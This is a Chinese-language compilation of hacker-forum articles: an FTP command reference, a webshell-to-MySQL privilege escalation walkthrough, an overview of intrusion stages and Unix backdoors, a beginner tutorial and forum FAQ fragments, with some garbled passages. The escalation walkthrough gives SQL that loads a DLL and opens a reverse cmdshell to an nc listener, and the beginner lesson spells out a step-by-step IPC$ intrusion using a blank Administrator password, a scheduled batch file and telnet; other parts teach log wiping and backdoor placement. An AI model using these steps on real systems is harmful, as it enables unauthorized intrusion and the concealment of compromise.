FTP命令详解
ascii: 设定以ASCII方式传送文件(缺省值)
bell: 每完成一次文件传送,报警提示.
binary: 设定以二进制方式传送文件.
bye: 终止主机FTP进程,并退出FTP管理方式.
case: 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母.
cd: 同UNIX的CD命令.
cdup: 返回上一级目录.
chmod: 改变远端主机的文件权限.
close: 终止远端的FTP进程,返回到FTP命令状态,
所有的宏定义都被删除.
删除: 删除远端主机中的文件.
dir [remote-directory] [local-file]
列出当前远端主机目录中的文件.如果有本地文件,就将结果
写至本地文件.
get [remote-file] [local-file]
从远端主机中传送至本地主机中.
help [command]
输出命令的解释.
lcd: 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录.
ls [remote-directory] [local-file]
同DIR.
macdef: 定义宏命令.
m删除 [remote-files]
删除一批文件.
mget [remote-files]
从远端主机接收一批文件至本地主机.
mkdir directory-name
在远端主机中建立目录.
mput local-files
将本地主机中一批文件传送至远端主机.
open host [port]
重新建立一个新的连接.
prompt: 交互提示模式.
put local-file [remote-file]
将本地一个文件传送至远端主机中.
pwd: 列出当前远端主机目录.
quit: 同BYE.
recv remote-file [local-file]
同GET.
rename [from] [to]
改变远端主机中的文件名.
rmdir directory-name
删除远端主机中的目录.
send local-file [remote-file]
同PUT.
status: 显示当前FTP的状态.
system: 显示远端主机系统类型.
user user-name [password] [account]
重新以别的用户名登录远端主机.
WEBSHELL提升权限又一招
--------------------------------------------------------------------------------
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成
中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没
这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权
方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现
,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。
WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传
上去了,一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,哈连接
成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反
弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不
多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname
'd:\\php\\php\\Mix.dll'; 来注册函数.
出现SQL语句成功执行!
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用
截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,执行成功
,然后看看我们的NC有反映没,成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服
务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该
服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使
用方法和Mix一样,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string
soname 'D:\\php\\php\my_udf.dll'; 执行语句成功后,然后我们就开始激活这个函数,输入语句:
select my_udfdoor (''); 然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了.
OK成功!测试结束咯
黑客初级技术总览[6页]
--------------------------------------------------------------------------------
www.hackbase.com 阅读: 时间:2005-7-13 10:17:35 来源:www.hackbase.com
【简 介】
网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整
性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。
网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、
完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安
全是网络安全的目标,信息安全包括两个方面:信息的存储安全和信息的传输安全。信息的存储安全是
指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程
中安全。为了确保网络信息的传输安全,有以下几个问题:
(1)对网络上信息的监听
(2)对用户身份的仿冒
(3)对网络上信息的篡改
(4)对发出的信息予以否认
(5)对信息进行重发
对于一般的常用入侵方法主要有
1.口令入侵
所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用
一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被
称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深
入了解系统的内部结构,是初学者的好方法。
2.特洛伊木马术
说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客
完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦
用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由
于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它
的复杂性,一般的系统管理员很难发现。
3.监听法
这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所
谓艺高人胆大。
网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数
据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:
“嗨!你们中有谁是我要发信息的工作站。”
此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。
”联接就马上完成。
目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的监听到数据,甚至就包含口令文
件,有的服务在传输文件中直接使用明文传输,这也是非常危险的。
4.E-mail技术
使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对
网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。
5.病毒技术
作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,
特殊时间,特殊地点完全可以使用。
6.隐藏技术
网络攻击的一般步骤及实例
攻击的准备阶段
首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应
该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要
讨论远程攻击。
进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取
得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,
破解密码,日志清除等技术,下面分别介绍。
1.确定攻击的目的
攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后
果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,
而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of
Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标
的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员
权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用
软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜
测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。
2.信息收集
除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主
要包括目标的操作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信
息。
要攻击一台机器,首先要确定它上面正在运行的操作系统是什么,因为对于不同类型的操作系统,
其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种操作系统的不同版本的系统漏洞
也是不一样的。要确定一台服务器的操作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其
操作系统。例如当我们通过TELNET连上一台机器时,如果显示
Unix(r)System V Release 4.0
login:
那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5.5或5.5.l。但这样确定操作系
统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。
还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型
和操作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。
另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统
的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发
送特殊的包,然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包(或者是任何
没有ACK或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、
CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那
么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关
闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分
类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含
的窗口长度,这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现
的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。
获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某
一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般TELNET在23端口,FTP在对21端口,
WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所监听的端口号。
在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP
服务,可以使用wuftp、proftp,ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客
利用系统漏洞攻破网站。
另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的
名称、规模,网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系,实际上
很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码,如果掌
握了该电话号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完
成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。
攻击的实施阶段
1.获得权限
当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动
攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定
的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系
统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。
能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成
的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的
Powered by Apache图样(羽毛状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻
击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。
当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该
软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非
法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出
漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。
无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击
,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如
Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(
www.securityfocus.com)等网站去查找。
2.权限的扩大
系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行
攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用
远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要
做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。
只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的
扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程
序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已
经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程
序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就
会被记录下来,下次黑客再登录时就可以使用su变成root了。
攻击的善后工作
1.日志系统简介
如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发
现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了
自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了
解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统
的不同略有变化
/usr/adm——早期版本的Unix。
/Var/adm新一点的版本使用这个位置。
/Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。
/etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的
位置。
下面的文件可能会根据你所在的目录不同而不同:
acct或pacct-一记录每个用户使用的命令记录。
accesslog主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服
务器。
aculo保存拨出去的Modems记录。
lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。
loginlog一记录一些不正常的L0gin记录。
messages——记录输出到系统控制台的记录,另外的信息由Syslog来生成
security记录一些使用 UUCP系统企图进入限制范围的事例。
sulog记录使用su命令的记录。
utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。
Utmpx,utmp的扩展。
wtmp记录用户登录和退出事件。
Syslog最重要的日志文件,使用syslogd守护程序来获得。
2.隐藏踪迹
攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言)
,包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就
是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员
,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法
的具体细节根据不同的操作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要
做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last
等命令查看日志文件时,隐藏掉此用户的信息。
管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但
这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打
印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比
较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻
入这台主机,也很可能攻入loghost。
只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马
迹的。例如安装了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统
程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑
客网站可以找到,比较常见的有LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、ps
、netstat、inetd等等一系列重要的系统程序,当替换了ls后,就可以隐藏指定的文件,使得管理员在
使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。
3.后门
一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下
一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门
,供网络管理员参考防范。
<1>密码破解后门
这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可 以通过破解密
码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然
可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管
理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。
<2>Rhosts + + 后门
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方
法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输
入"+ +",就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享
时,入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常
缺少日志能力. 许多管理员经常检查 "+ +",所以入侵者实际上多设置来自网上的另一个帐号的主机名
和 用户名,从而不易被发现。
<3>校验和及时间戳后门
早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的
程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时
间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间,然后调整trojan文件的时间为
系统时间。一旦二进制trojan文件与 原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基
于CRC校验,很容易 骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是
被 大多数人推荐的,MD5使用的算法目前还没人能骗过。
<4>Login后门
在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修
改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令,它将忽视管理员设置
的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至 是root。由于后门口令是在用户真实登录并
被日志记录到utmp和wtmp前产生一个访问 的,所以入侵者可以登录获取shell却不会暴露该帐号。管理
员注意到这种后门后,便 用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形
毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效. 所以更多的管理员是 用MD5校验和
检测这种后门的。
<5>Telnetd后门
当用户telnet到系统,监听端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些
入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信
息的检验,比如用户使用了何种终端. 典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门,
当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定
源端口的连接产 生一个shell。
<6>服务后门
几乎所有网络服务曾被入侵者作过后门. Finger,rsh,r执行,rlogin,ftp,甚至 inetd等等的作
了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时
用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些
服务正在运行,并用MD5对原服务程序做校验。
<7>Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到
2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置
入后门。
<8>库后门
几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象
crypt.c和_crypt.c这些函数里作了后门;象login.c这样的程序调用了 crypt()。当使用后门口令时产
生一个shell。 因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并
不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,
有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以
当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲
过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接
程序不会使用trojan共享库。
<9>内核后门
内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能
识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每
人知道它事实上传播有多广。
<10>文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括
exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等!有时为了防止管理员发现这么
大的文件,入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件,在很低的级别,入侵者做这
样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问
这些隐藏的文件,对于普通的管理员来说,很难发现这些"坏扇区"里的文件系统,而它又确实存在。
<11>Boot块后门
在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员
没有检查根区的软件,所以一些入侵者将一些后门留在根区。
<12>隐匿进程后门
入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和监听程序 (sniffer),有许
多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将
sniffer程序改名类似in.syslog再执行,因此 当管理员用"ps"检查运行进程时,出现 的是标准服务名
。可以修改库函数致使 "ps"不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进
程表显现。使用这个技术的一个后门例子是
amod.tar.gz :
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行. 这些网络通行后 门有时允
许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就
能实现访问. 因为这是通过非标准网络端口的通行,管理 员可能忽视入侵者的足迹. 这种后门通常使用
TCP,UDP和ICMP,但也可能是其他类型报文。
<14>TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他 们用口令进
行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那
些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可
以放在SMTP端口,许多防火墙允许 e-mail通行的.
<15>UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能
显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置
在这个端口,允许穿越防火墙。
<16>ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部
的机器,入侵者可以放数据入Ping的ICMP包,在ping的机器间形成一个shell通道,管理员也许会注意到
Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。
<17>加密连接
管理员可能建立一个sniffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能
被判定两台机器间的传输内容了。
黑客技术入门篇
--------------------------------------------------------------------------------
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够
的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!
已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜
托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记!
第一节课:命令的使用
你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下
面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~
放你的长假去吧!
1.net
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的.
net user \\列举所有用户\\ 例子:c:\>net user
net localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest用
户加到管理组.需要有足够的权限才能进行操作!\\
net share \\显示共享资源\\ 例子:c:\>net share
net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\
启动telnet\\
net stop \\停止Windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\
net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\
net use \\显示关于计算机连接的信息\\ 例子:c:\>net use
net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view
net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)课程需要用的命
令是这些而已~自己去windows帮助那里看看吧!DOS下的基本命令是很重要的!如:copy等.还有ftp等等重
要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!!!)好了~下课~
第二节课:端口和木马
A.第二节课了~这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们
看网页用的实际上是80端口.
1)、telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机.
2)、WWW(80/TCP)端口
它表明WWW服务在该端口运行
别告诉我你不知道WWW服务是什么哦,也就是说,如果有网站的服务器都有80端口。
3)、FTP(21/tcp)
ftp服务和TELNET服务一样,你还可以从FTP服务器上获得或上传柿夏韭淼龋械幕故悄涿锹降模还
庋暮檬潞孟癫欢唷?
4)、finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。
5)、远程控制(3389)
这个端口用于远程登陆.
还有一些常见的端口例如110,135,139,25等等等.....我们这次基础教程需要用到的是23端口.其它的因
为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题!请谅解!)PS:并不
是所有的端口都是有用的.
B.木马
讲个故事给大家听吧!---->>传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵
藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。
木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下
了特洛伊城。
木马的危害性是很大的!例如冰河等木马甚至可以远程控制你的电脑!同时木马也会打开一些端口.你也可
以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.
需要用杀毒软件帮忙了~ \\我们的课程并不需要使用到木马.只是本人认为各位值得一学\\
第三节课:ipc入侵.
好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你
的AK-47,我们不需要那个家伙....
A.什么是ipc?
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享
资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连
接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可
以配合字典,进行密码尝试。
B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?
需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上K了你!)
首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.
确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)
假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么
没安全意识...)
打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容:@net start telnet 然后保存为a.bat
\\注意扩展名!是bat!\\
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
net time \\127.0.0.1 \\看看到时间没?\\
假设到了,我们就实行下一步吧!
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\
OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)
好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上面的那么容易.会出现很
多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了
黑客文章经典汇总(一) (二)
不该问的问题
简单说明:
我很无奈地吧这条放在了第一位。
相关帖子:
找软件 在这里 华军软件园 http://bj2.onlinedown.net/ ;
找代理 在这里
http://search.lycos.com.cn/dir/Computers_and_Internet/Free_Resource/Free_Proxy_Server/ ;
http://www8.big.or.jp/~000/CyberSyndrome/psr3.html ;
找师傅 论坛就是你的“老师”。
找注册码 在这里 http://www.skycn.com/soft/4445.html ;
关于认证会员和搜索功能
简单说明:
为了保证服务器的正常工作,现在只有认证会员才能使用搜索功能。另外,认证会员还有资格进入“永
远的灰色轨迹”版。要想成为认证会员并不难,但也不简单。你应该努力提高自己,积极帮助别人,多
发有质量的帖子(包括提问和回答)。如果你真心融入论坛大家庭,你得到的将绝不仅仅是一个认证资
格。
相关帖子:
关于认证问题的讨论: http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=10485&show=352 ;
关于被入侵
简单说明:
经常有帖子说:“我中xx木马啦,怎么办?”、“我的windows有问题,是不是被入侵啦?”等等。通用
的做法是查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库
